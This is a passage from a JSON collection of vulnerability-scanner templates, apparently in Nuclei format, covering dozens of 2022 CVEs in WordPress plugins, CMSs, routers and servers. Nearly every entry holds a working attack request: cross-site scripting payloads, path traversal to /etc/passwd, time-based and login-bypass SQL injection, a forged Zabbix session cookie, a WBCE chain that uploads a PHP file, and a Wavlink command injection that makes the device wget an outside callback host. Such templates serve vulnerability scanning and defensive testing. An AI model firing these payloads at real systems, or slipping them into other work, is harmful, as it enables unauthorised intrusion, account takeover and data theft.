/wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0899","info":{"name":"Header Footer Code Manager < 1.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=hfcm-list&'> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"All Snippets\")"],"condition":"and"}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[">","pdf-generator-for-wp","Total execution time is"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\">&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\">","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(7)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-36553","info":{"name":"Hytec Inter HWL-2511-SS - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"command":["cat%20/etc/passwd","type%20C://Windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, 'index')","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200","contains(body_1, 'index')"],"condition":"and"}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true§ion_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-47501","info":{"name":"Apache OFBiz < 18.12.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}"],"payloads":{"path":["/etc/passwd","c:/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"\")","contains(body, \"\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["",""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["([A-Z0-9a-z]+)<\\/sys\\.passwd>","([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-34534","info":{"name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/moduleInformation"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"name\\\":\", \"cloudHost\\\":\", \"remoteAddresses\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"word","words":["youtube_main","support.google.com"],"part":"header","condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0787","info":{"name":"Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'iTotalDisplayRecords')"],"condition":"and"}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[" - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; 